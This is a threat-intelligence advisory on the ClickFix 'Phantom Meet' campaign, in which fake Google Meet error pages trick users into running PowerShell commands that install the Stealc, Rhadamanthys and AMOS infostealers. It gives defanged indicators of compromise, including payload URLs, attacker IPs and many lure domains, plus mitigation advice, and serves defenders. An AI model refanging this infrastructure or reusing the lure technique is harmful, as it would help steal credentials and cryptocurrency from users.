Malware Hidden Behind Google Meet Deception in ClickFix Campaign

Threat Group: Slavic Nation Empire, Scamquerteo
Threat Type: Infostealer Malware, Social Engineering
Exploited Vulnerabilities: Application Layer Protocol (T1071), User Execution (T1204), Phishing (T1566), PowerShell (T1059.001)
Malware Used: Stealc, Rhadamanthys, AMOS Stealer
Threat Score: High (8.2/10) — The campaign employs sophisticated social engineering tactics, targeting both Windows and macOS systems with infostealers.
Last Threat Observation: October 18, 2024

Overview

The ClickFix campaign, particularly its variant called "The Phantom Meet," is a new social engineering attack that leverages fake Google Meet pages to deceive users into downloading and executing malicious scripts. The attackers display fabricated error messages on spoofed Google Meet interfaces, tricking users into running malware through PowerShell or terminal commands. This operation, active since 2024, is linked to cybercriminal groups "Slavic Nation Empire" and "Scamquerteo," focusing on cryptocurrency scams.

Key Details

• Delivery Method: The attack begins with phishing emails or compromised websites mimicking legitimate Google Meet error messages, prompting users to fix an alleged issue by running malicious code.
• Target: The primary targets are users in Poland and cryptocurrency enthusiasts, with both Windows and macOS systems affected.
• Functions:
  • Infostealing capabilities via Stealc, Rhadamanthys, and AMOS Stealer.
  • PowerShell scripts to download additional payloads.
  • Data exfiltration, focusing on cryptocurrency wallets and sensitive credentials.
  • Advanced obfuscation techniques using Base64-encoded scripts.
  • Use of fake Google Meet infrastructure to add legitimacy.

Attack Vectors

The attack employs phishing as the initial vector. Upon visiting a compromised Google Meet page, users are shown an error message prompting them to copy and paste a PowerShell script to resolve an issue. Once executed, the script installs infostealers such as Stealc or Rhadamanthys, which siphon sensitive data and system information, including cryptocurrency wallets. The campaign uses obfuscation techniques to avoid detection, including Base64-encoded scripts and malicious domains.

Known Indicators of Compromise (IoCs)

File Hash (MD5):

• 51f8527e20dcb05ffd8586b853937a8a
• ba0767946d9cac95fd727d7076c7fec1
• e7959e4089c1993045e01cb9c3cbc6a5

File Hash (SHA1):

• 31c713eabc90f61b44703a8d30e7ced6e2941f23

File Hash (SHA256):

• 2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe
• 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138
• 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5
• a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c

IPv4 Addresses:

• 77[.]221[.]157[.]170
• 85[.]209[.]11[.]155
• 95[.]182[.]97[.]58

URLs:

• hxxp://77[.]221[.]157[.]170:3004/server[.]js
• hxxp://85[.]209[.]11[.]155/joinsystem
• hxxp://95[.]182[.]97[.]58/84b7b6f977dd1c65[.]php
• hxxps://carolinejuskus[.]com/f9dfbcf6a999/7cc2f5dc3c76/load[.]51f8527e20dcb05ffd8586b853937a8a[.]php?call=launcher
• hxxps://carolinejuskus[.]com/kusaka[.]php?call=launcher
• hxxps://googIedrivers[.]com/fix-error
• hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj
• hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh
• hxxps://meet[.]google[.]us07host[.]com/coc-btru-ays
• hxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa
• hxxps://us18web-zoom[.]us/ram[.]exe
• hxxps://us18web-zoom[.]us/stealc[.]exe
• hxxps://webapizmland[.]com/api/cmdruned

Domains:

• alienmanfc6[.]com, apunanwu[.]com, argongame[.]com
• battleforge[.]cc, battleultimate[.]xyz, bowerchalke[.]com
• calipsoproject[.]com, carolinejuskus[.]com, cautrucanhtuan[.]com
• cozyland[.]xyz, cozymeta[.]com, cozymeta[.]fun
• cozymeta[.]xyz, cozyweb3[.]com, cozyworld[.]io
• cphoops[.]com, darkblow[.]com, dekhke[.]com
• doculuma[.]com, fatoreader[.]com, fatoreader[.]net
• gamascript[.]com, googiedrivers[.]com, iloanshop[.]com
• kansaskollection[.]com, lastnuggets[.]com, lirelasuisse[.]com
• lunacy3[.]com, lunacy4[.]com, mdalies[.]com
• mensadvancega[.]com, mishapagerealty[.]com, missingfrontier[.]com
• modoodeul[.]com, mor-dex[.]world, mordex[.]blog
• mordex[.]digital, mordex[.]homes, mybattleforge[.]xyz
• myultimate[.]xyz, ngtmeta[.]io, ngtmetaland[.]io
• ngtmetaweb[.]com, ngtproject[.]com, ngtstudio[.]io
• ngtstudio[.]online, ngtverse[.]org, night-support[.]xyz
• nightpredators[.]com, nightstudio[.]io, nightstudioweb[.]xyz
• nor-tex[.]eu, nor-tex[.]pro, nor-tex[.]world
• nor-tex[.]xyz, nort-ex[.]eu, nort-ex[.]lol
• nort-ex[.]world, nortex-app[.]pro, nortex-app[.]us
• nortex-app[.]xyz, nortex[.]blog, nortex[.]digital
• nortex[.]life, nortex[.]limited, nortex[.]lol
• nortex[.]uk, nortexapp[.]com, nortexapp[.]digital
• nortexapp[.]io, nortexapp[.]me, nortexapp[.]pro
• nortexapp[.]xyz, nortexmessenger[.]blog, nortexmessenger[.]digital
• nortexmessenger[.]pro, nortexmessenger[.]us, pakoyayinlari[.]com
• patrickcateman[.]com, phperl[.]com, playbattleforge[.]org
• playbattleforge[.]xyz, playultimate[.]xyz, projectcalipso[.]com
• riotrevelry[.]com, sleipnirbrowser[.]org, sleipnirbrowser[.]xyz
• stonance[.]com, thecalipsoproject[.]com, thewatch[.]com
• tooldream[.]live, ultimategame[.]xyz, ultimateplay[.]xyz
• us002webzoom[.]us, us003webzoom[.]us, us004web-zoom[.]us
• us005web-zoom[.]us, us006web-zoom[.]us, us007web-zoom[.]us
• us008web-zoom[.]us, us01web-zoom[.]us, us01web[.]us
• us03web-zoom[.]us, us03web[.]us, us050web-zoom[.]us
• us055web-zoom[.]us, us07web-zoom[.]us, us08web-zoom[.]us
• us08web[.]us, us09web-zoom[.]us, us09web[.]us
• us10web-zoom[.]us, us12web[.]us, us15web[.]us
• us18web-zoom[.]us, us20web[.]us, us30web-zoom[.]us
• us40web-zoom[.]us, us40web[.]us, us45web-zoom[.]us
• us4web-zoom[.]us, us500web-zoom[.]us, us505web-zoom[.]us
• us50web-zoom[.]us, us50web[.]us, us555web-zoom[.]us
• us55web[.]us, us5web-zoom[.]us, us60web-zoom[.]us
• us6web-zoom[.]us, us70web-zoom[.]us, us77web-zoom[.]us
• us80web-zoom[.]us, us85web-zoom[.]us, us95web-zoom[.]us

Hostnames:

• meet.googie.com-join.us, meet.google.cdm-join.us, meet.google.com-join.us
• meet.google.us-join.com, meet.google.us07host.com, meet.google.web-join.com
• meet.google.webjoining.com

Mitigation and Prevention

1. User Awareness: Educate employees on phishing tactics, especially involving fake Google Meet error messages.
2. Email Filtering: Strengthen filters to block phishing emails containing suspicious HTML attachments.
3. PowerShell Restrictions: Limit the use of PowerShell commands, especially for non-admin users.
4. Antivirus Protection: Ensure up-to-date antivirus software that can detect infostealers like Stealc, Rhadamanthys, and AMOS Stealer.
5. Two-Factor Authentication: Enforce 2FA for critical accounts, particularly cryptocurrency wallets.
6. Monitor Logs: Regularly check system logs for suspicious PowerShell activity.
7. Regular Updates: Keep systems and software updated to reduce vulnerabilities.

Conclusion

The ClickFix campaign represents an advanced and evolving cyber threat, combining social engineering with sophisticated malware distribution. The use of fake Google Meet pages and phishing emails demonstrates the attackers' adaptability, particularly in targeting cryptocurrency users. By implementing robust email filtering, limiting PowerShell access, and educating users on these tactics, organizations can significantly reduce the risk of compromise.

Sources

• AlienVault: "ClickFix tactic: The Phantom Meet"
• BackBox: "Crafty ClickFix-Style Phishing Campaign Targets Microsoft OneDrive Users"
• GBHackers: "Hackers Using ClickFix Social Engineering Tactics to Deploy Malware"
• McAfee: "ClickFix Deception: A Social Engineering Tactic to Deploy Malware"